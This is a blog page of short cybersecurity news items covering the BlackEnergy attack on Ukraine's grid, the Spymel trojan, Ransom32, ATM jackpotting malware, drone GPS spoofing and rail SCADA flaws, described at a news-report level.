Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Hackers caused power cut in western Ukraine

Department of Homeland security’s (DHS’s) Industrial Control systems cyber emergency response team (ICS-CERT) has identified a piece of malicious code known as ‘BlackEnergy’ in the networks of a power company in western Ukraine.

The code came to light when the intelligence community of United States investigated a cyber attack on the Ukrainian power grid which was caused last year in December.

BlackEnergy, which is a sophisticated malware campaign, has been ongoing since at least 2011. It targets industrial control systems and has been identified on Internet-connected human-machine interfaces in the United States.

The investigation shows that the power outages were caused by a series of network-centric attacks against multiple utilities which disrupted Supervisory control and data acquisition (SCADA) and phone systems.
ICS-CERT and US-CERT along with Ukrainian CERT are still analyzing the malware which was likely used to prevent system operators from detecting the attack while a remote attacker opened breakers.

The not so sophisticated malware may have been used to shield the perpetrators.

On December 23 a power cut affected 80,000 customers for six hours. The attacks cut at least seven 110 Kilo volt (kV) and twenty three 35 kV substations.

Russian government was blamed for this incident by Ukraine’s security service, but later it was noted that BlackEnergy was associated with the incident which is associated with the ethnic Russian hacking group ‘Sandworm’. In October 2014, Sandworm reportedly compromised industrial control systems in the US for up to three years.

The malware has been found attacking utilities and media organizations with the hard-drive nuking killdisk componentry.

Former NSA and CIA head, retired Gen. Michael Hayden warned about the increasing threat of physical damages by malware infections.
Read more »
IT Security News
IT Security News

A trojan that evades security products and stole data

Spymel, a new Trojan discovered by Zscaler (a US-based cyber-security vendor), reaches computer through spam emails and remain undetected from security products.

This Trojan is attached to emails as an archive file. Once it is downloaded and decompressed, the archive file starts executing a JavaScript file that downloads and installs the actual malware executable, a .NET binary.
It is notion that the  archive file does not contain the malware, so the antivirus products fails to flag the danger. .Net binary is also not detected because of the  digital certificate that is issued by  SBO INVEST via DigiCert.

According to Zscaler  Spymel infections was  first detected in early December 2015. As soon as they informed the case to DigiCert and had the certificate revoked. But the group behind Spymel quickly updated their certificate
.
Spymel can act like a malware payload downloader , make screenshots of a user's desktop, record videos of the desktop, log keystrokes, and upload stolen data to a remote server.

Spymel is a perfect example of  malware, where malware can use archive files boobytrapped with JavaScript code and digital certificates to hide.
Read more »
Cyber Security News
Breaking News Cyber Security News

Mozilla awarded $2,500 to security researcher

Security Researcher Ashar Javed, recently discovered three bugs with Mozilla add-ons portal and that had been exploited via "Create new collection" feature.

It was discovered that malicious codes could be inserted in collection of  Mozilla Add - ons . These ad - ons are basically used to organize add-ons for business and personal purposes and can be shared on social media as well.

“Given that the Mozilla add-on site has millions of downloads, it is easily possible for the attacker to convince the victim to visit the collection page,” the expert told SecurityWeek.

Users were later exposed with all kinds of virus attack that could be carried via XSS flaws  and most common attack was cookie theft.

Websites are generally vulnerable to  XSS flaw, add-on collections are very useful for Firefox users, so for discovering the issue Mr Javed recieved $2,500 from Mozilla. There were two other bugs discovered about which Mozilla did not reveled any information apart from the location.

This is not the first time that he had received the heavy amount, Google awarded him $3,000 for a reflected XSS in the main search bar of the YouTube Gaming website.
Read more »

Malware targeting Android-powered Smart TVs

With the end to the festive season, a lot of homes are now quipped with smart gadgets, making people lazier than ever. Out of all the new gadgets that rolled out on the streets, one of the most popular choices were smart TVs. Having access to Android apps and functioning as well as to any other Android device, these TVs are a hit in the market as they provide the high resolution experience with the beloved Android interface. However, these devices have their own vulnerabilities to malwares.

These TVs have abilities that a normal TV doesn't have access to. These smart TVs can use certain apps that allow users to watch channels from other parts of the world (that would otherwise be unavailable via other methods) . However, some of these apps may put users at risk. These apps contain a backdoor that abuses an old flaw (CVE-2014-7911) in Android versions before Lollipop 5.0 (Cupcake 1.5 to Kitkat 4.4W.2). (We detect these malicious apps as ANDROIDOS_ROOTSTV.A.) Most smart TVs today use older versions of Android, which still contain this flaw. In addition, other Android devices with older versions installed are also at risk: it just happens to be that  these kinds of apps are mainly used in smart TVs or smart TV boxes. The sites that distribute these malicious apps are located at the following URLs. These sites are under the H.TV name, with most visitors located in the United States or Canada.

To successfully distribute the malware, attackers lure users to websites that distribute it and get them to install the applications that are infected with the backdoor. As soon as the malicious applications have been installed, the attacker triggers the vulnerability in the system and use well-known exploit techniques like heap sprays or return-oriented programming to gain elevated privileges in the system.

Samsung had recently launched the three tiered security solution for its latest Tizen-based Smart TVs. According to the company's statement, this service is meant to give its consumers access to the necessary protection across the Smart TV ecosystem, covering both software and hardware.
Read more »
Security News
Security News

Security flaw in Trend Micro unveiled by Google security Researcher

Google security researcher, Tavis Ormandy has found bugs in Password Manager of global security software company, Trend Micro.

Password Manager is a component installed by default with Trend Micro’s Premium Security and Maximum Security home products.

Ormandy informed Trend Micro about his findings on January 05.

The bug which is primarily written in JavaScript with node.js could allow remote code execution by any website and steal all passwords of a user. He also noted that it was also possible to bypass Internet Explorer’s Mark of the web (MOTW) security feature and execute commands without letting the victim receive any notification.

Ormandy took 30 seconds to identify an API that could be leveraged for remote code execution (RCE).  Overall, Ormandy found over 70 APIs exposed to the Internet.

Exploiting a vulnerability can give an attacker deep access to a computer.

Several serious vulnerabilities have been found in the last seven months in antivirus products from vendors including Kaspersky Lab, ESET, Avast, AVG Technologies, Intel Security (formerly McAfee) and Malwarebytes.
Read more »

Europol dismantles ATM malware gang

A recent malware known as Tyupkin and Padpin has been discovered by Europol, which is being used by attackers to conduct a new type of attack which is commonly being known as "jackpotting attacks". This malware was first analyzed in 2014 by the Kaspersky labs since its presence was noted in more than 50 machines in eastern europe. It is known for its capability to enable its operators to withdraw money from ATMs without cards.

Romania's Directorate for Investigating Organised Crime and Terrorism (DIICOT) stated that the arrested individual are under suspicion of establishing an organised criminal group, illegally accessing computer systems, causing computer fraud,  disrupting information systems, alternating data integrity, operating devices and software illegally and destructing property.

A damage of approximately $217,000 is claimed to have caused by the suspects, residents of Romania and the Republic of Moldova. A group, led by the Moldovan national Solozabal Cuartero Rodion and Romanian national Mihaila Sorin, have been targeting various ATMs in Europian countries, primarily Romania, Hungary, the Czech Republic, Spain and Russia, as reported by the Romanian prosecutors.

(pc-google images)
The first phase of the attack started to take place in weekdays, members of the group scouted ATMs, which specifically targeted the 24-hr cash machines with possibilities of manipulation. After locating an ATM, tamperings were made accordingly to the machines in order to gain access to its CD-ROMs, which is then used as the site of planting the malware. The group used to deactivate all the existing alarm systems with duct tape. The malware planted on weekdays, started its function on weekend. Once it was planted on an ATM, the group sent commands to the malware, instructing the machine to dispense cash automatically.

The group set a characteristic method of dispensing cash in small transactions of $1000 rather than sweeping the machines in one go. Once the machine dispenses all the cash, the malware would automatically be removed from the machine. Since these attacks cause serious harm to the ATMs, European ATM Security Team (EAST) and Europol had published certain guidelines last year to help the members of law enforcement and the industry to counter the threat and in September, the security firms started reporting two new malware families. One of these, known as GreenDispense, is found similar to Tyupkin as it uses the machine's PIN pad to empty the vault. The other, called Suceful, acts as a captor for cards inserted by cardholders into ATMs.
Read more »

Time Warner Cable says 320000 passwords possibly stolen

American Telecommunications Company, Time Warner Cable Inc has declared that up to 320,000 customers may have their email passwords got stolen.

The company has not yet determined the source of theft but it said that the theft might have occurred either through malware downloaded during phishing attacks or indirectly through data breaches of other companies that stored customer’s information.

The company came to know about the breach after it was notified by the Federal Bureau of Investigation.

The company is sending emails to encourage customers to update their email passwords as a precaution.
Read more »

NEWLY DISCOVERED RANSOMWARE FACILITATES MALWARES FOR SECURITY BREACH

Security researchers have discovered a newly discovered Ransomware-as-a-Service campaign that uses malware written in JavaScript for the first time. Fabian Wosar of Emsisoft has explained in his blog post that Ransom32 is used to sign up to on a Tor site using just a Bitcoin address to which the spoils will be sent without a 25% cut.


(pc-google images)
After the sign up, the users get access to basic admin page that enabled them to see how many systems are infected; observe how much money has been collected; and tweak various settings for the ransomware. These include how much BTC to request from victims, and whether to completely lock the computer or allow a victim to minimize the lock screen, giving them the ability to check whether their files are fully encrypted or not. Ransom32 is a 22MB self-extracting RAR file, which weighs in at over 67MB when extracted. Once run, the executable creates a shortcut, ChromeService, which points to a chrome.exe package.

that is actually a NW.js package that contains Javascript code that will encrypt the victim's data and then display a ransom note.

The files extracted into the Chome Browser folder are:

    chrome - The Chromium license agreement.
    chrome.exe - This is the main executable for the malware and is a packaged NW.js application bundled with Chromium.
    ffmpegsumo.dll - HTML5 video decoder DLL that is bundled with Chromium.
    g - The settings file that contains various information used by the malware. This information includes the affiliate's ransom amount, bitcoin address that they receive payments on, and error message that is shown in a messagebox if the Show a message Box setting was enabled.
    icudtl.dat - File used by Chromium
    locales - Folder containing various language packs used by Chrome.
    msgbox.vbs - The messagebox displayed if the affiliate enabled the Show a message Box setting.
    nw.pak - Required for the NW.JS platform.
    rundll32.exe - Renamed TOR executable so that the malware can communicate with the TOR Command and Control server.
    s.exe - Renamed Shortcut.exe from OptimumX. This is a legitimate program used by the malware to create the ChromeService shortcut in the Startup folder.
    u.vbs - A VBS script that deletes a specified folder and its contents.
Read more »

Rasberry Pi Foundation was offered money to install Malware

The Raspberry Pi Foundation has been offered money to install malware into the mini computers before they are shipped out to users.

The foundation makes extremely simple computer which looks and feels very basic, but could be built into many geeky projects and due to its low-cost appeal, it has sold approximately 4 million units.

Last month, the foundation unveiled a programmable computer, The Raspberry Pi Zero which priced just $5. It may also rank as the world's cheapest computer.

The shocking revelation was made when the foundation last Wednesday tweeted a screenshot of an email in which a business officer, Linda asked Raspberry Pi’s director of communications, Liz Uptonto to install a suspicious executable file onto machines for which they will be offered a ‘price per install’
.


However, the foundation declined the offer of the unknown company but it raises the question about the common, widespread issue.
Read more »

Drones new target for drug trafficker in US

Unmanned air vehicles (UAV’s) are new instruments for surveillance and are widely used by military and other sensitive agencies, but what will happen if they are being  hacked by the attackers.

According to the reports of the US Department of Homeland Security (DHS) and the US Customs and Border Protection (CBP) agency drug traffickers have hacked unmanned air vehicles (UAVs, drones) in order to illegally and secretly cross the US-Mexican border.

Drones used by US military cost millions of dollars, but drones used by other law enforcement agencies are much more cheaper and are prone to GPS spoofing attacks.

UAV’s have GPS receivers, which is used to receive  data from off-orbit satellites and navigate. However drug traffickers  used GPS spoofing technique to illegally send UAV’s wrong coordinates.

After receiving wrong coordinates, drones corrects themselves and leave their normal patrol area. Once they leave their normal area of the GPS jammer & spoofing device, it then tries to correct again, going back to its proper patrol area. It keeps on going back and forward until it remains out of fuel and returns to base, or the traffickers safely crossed the border and turn off their jammers.

The only way to prevent GPS spoofing is to use in built high cost of anti-spoofing  hardware.

 Michael Buscher, CEO of Vanguard Defense Industries said, “this is a very costly module, and also very bulky. Adding such equipment to a drone is not only very expensive but also affects the drone's flight time, something which both the DHS and CBP are not willing to accept.”

The only solution to this security holes is to wait for technology to advance and cut down on its manufacturing prices.
Read more »
Information Security News
Information Security News

Irked train hackers talk derailment flaws, drop SCADA password list

A report published in The Register says that Russian hackers claimed to have found out flaws in rail networks which allow crooks to hijack and derailment.

The flaws reportedly affect various systems including mobile communication and interlocking platforms that control braking and help prevent collisions.

“Industrial control specialist hackers Sergey Gordeychik, Aleksandr Timorin, and Gleb Gritsai did not describe the bugs in detail, since that would allow others to replicate the attacks nor reveal the names of the affected rail operators,” the report reads.

According to the report, "If somebody can attack the modem, the modem can attack the automatic train control system, and they can control the train," Gordeychik says

So, there is a danger as the flaws expose physical systems like power grids, dams, and trains to unauthorized external modification in ways largely unknown to those outside of the security industry.

It is said that human programming errors were responsible for various remote code execution holes which could affect interlocking systems.

“We are releasing the list to force vendors to not use hardcoded and default passwords," an irritated Gordeychik says.
 
The Register report says that the attack vectors against computer-based interlocking include attacks against workstation, attacks against networking gateways that connect interlocking to the rest of the world, and communications between CPU and object controllers and wayside devices.
Read more »
Subscribe to: Comments (Atom)